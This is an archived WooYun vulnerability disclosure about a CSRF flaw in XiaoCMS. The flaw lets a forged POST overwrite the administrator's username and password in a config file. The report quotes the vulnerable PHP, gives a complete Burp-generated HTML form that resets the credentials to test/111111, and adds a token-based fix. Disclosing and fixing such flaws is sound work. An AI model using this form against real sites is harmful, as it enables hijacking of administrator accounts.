WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
2014-07-04: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly.
2014-10-02: The vendor has chosen to ignore the vulnerability; details are now disclosed to the public.
CSRF
This design is genuinely hard to understand: the password-change form can also change the administrator's username directly, and neither value lives in the database. The username and password are stored in /data/config/admin.ini.php instead.
public function configAction()
{
    $admin = xiaocms::load_config('admin');
    $data  = $this->site_config;
    if ($this->post('submit')) {
        // Admin credentials are taken straight from the POST body
        $postadmin = $this->post('admin');
        if (empty($postadmin['admin_pass'])) {
            $postadmin['admin_pass'] = $admin['admin_pass'];
        } else {
            $postadmin['admin_pass'] = md5(md5($postadmin['admin_pass']));
        }
        $admin_arr = var_export($postadmin, true);
        $admin_txt = "<?php" . PHP_EOL . "if (!defined('IN_XIAOCMS')) exit();" . PHP_EOL . "return " . $admin_arr . ";";
        // Written to /data/config/admin.ini.php with no token, origin or confirmation check
        file_put_contents(DATA_DIR . 'config' . DIRECTORY_SEPARATOR . 'admin.ini.php', $admin_txt);

        $configdata = $this->post('data');
        $configdata['rand_code'] = md5(microtime());
        $config_arr = var_export($configdata, true);
        $config_txt = "<?php" . PHP_EOL . "if (!defined('IN_XIAOCMS')) exit();" . PHP_EOL . "return " . $config_arr . ";";
        file_put_contents(DATA_DIR . 'config' . DIRECTORY_SEPARATOR . 'config.ini.php', $config_txt);

        $this->show_message('修改成功', 1, url('index/config', array('type' => $this->get('type'))));
    }
    $file_list = glob(TEMPLATE_DIR . '*');
    $arr = array();
    foreach ($file_list as $v) {
        if (is_dir($v)) $arr[] = basename($v);
    }
    $theme = array_diff($arr, array('mobile'));
    $type  = $this->get('type') ? $this->get('type') : 1;
    $membermodel = get_cache('member_model');
    include $this->admin_tpl('config');
}
As you can see, the so-called password change simply writes the new password into the configuration file, with no validation at all, so both the username and the password parameters can be set to anything. Rather than build a request by hand, I tested with a PoC generated by Burp:
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://localhost/xiaocms/admin/index.php?c=index&a=config&type=3" method="POST">
      <input type="hidden" name="data[site_name]" value="XiaoCms企业建站版" />
      <input type="hidden" name="data[site_theme]" value="default" />
      <input type="hidden" name="data[site_mobile]" value="1" />
      <input type="hidden" name="data[site_title]" value="XiaoCms演示站" />
      <input type="hidden" name="data[site_keywords]" value="xiaocms" />
      <input type="hidden" name="data[site_description]" value="欢迎使用xiaocms内容管理系统 官方网站:http://www.xiaocms.com" />
      <input type="hidden" name="data[site_download_image]" value="1" />
      <input type="hidden" name="data[admin_template]" value="1" />
      <input type="hidden" name="data[admin_list_size]" value="10" />
      <input type="hidden" name="data[site_status]" value="2|头条 3|推荐 0|未审核" />
      <input type="hidden" name="data[site_watermark]" value="0" />
      <input type="hidden" name="data[site_watermark_pos]" value="9" />
      <input type="hidden" name="admin[admin_name]" value="test" />
      <input type="hidden" name="admin[admin_pass]" value="111111" />
      <input type="hidden" name="data[member_modelid]" value="5" />
      <input type="hidden" name="data[member_register]" value="1" />
      <input type="hidden" name="data[member_status]" value="1" />
      <input type="hidden" name="data[member_regcode]" value="1" />
      <input type="hidden" name="data[member_logincode]" value="1" />
      <input type="hidden" name="data[diy_url]" value="0" />
      <input type="hidden" name="data[list_url]" value="{catdir}/" />
      <input type="hidden" name="data[list_page_url]" value="{catdir}/list_{page}.html" />
      <input type="hidden" name="data[show_url]" value="{catdir}/{id}.html" />
      <input type="hidden" name="data[show_page_url]" value="{catdir}/{id}_{page}.html" />
      <input type="hidden" name="submit" value="提交" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
After the form is submitted, the username and password have been changed to test / 111111.
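For comparison, here is an added example (my own sketch, not XiaoCMS code) of the same save branch guarded by a per-session synchronizer token, which is the usual fix for this class of bug. csrf_token(), csrf_check() and save_admin_config() are hypothetical names, and the code assumes session_start() has already been called by the admin bootstrap.

```php
<?php
// Added example, not XiaoCMS code. Assumes PHP sessions are active.

function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        // 32 random bytes -> 64 hex chars, bound to this admin session only
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_check(array $post): bool {
    $expected = $_SESSION['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    // hash_equals compares in constant time; a missing or non-string token fails
    return $expected !== '' && is_string($given) && hash_equals($expected, $given);
}

// Hardened equivalent of the save branch in configAction(): refuse the write
// unless the token matches, and never let this request replace the admin name.
// Returns the admin.ini.php contents to write, or null when the request is rejected.
function save_admin_config(array $post, array $current_admin): ?string {
    if (!csrf_check($post)) {
        return null;  // cross-site form: a foreign origin cannot read the session token
    }
    $postadmin = $post['admin'] ?? array();
    if (empty($postadmin['admin_pass'])) {
        $postadmin['admin_pass'] = $current_admin['admin_pass'];
    } else {
        $postadmin['admin_pass'] = md5(md5($postadmin['admin_pass']));  // original scheme kept
    }
    // Renaming the administrator stays a separate, explicitly confirmed action
    $postadmin['admin_name'] = $current_admin['admin_name'];

    return "<?php" . PHP_EOL
         . "if (!defined('IN_XIAOCMS')) exit();" . PHP_EOL
         . "return " . var_export($postadmin, true) . ";";
}

// The settings form must carry a hidden field named csrf_token whose value is
// csrf_token(); the Burp-generated form above has no such field, so csrf_check()
// fails and nothing is written.
```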
Vendor response: the vendor could not be reached, or explicitly declined to respond.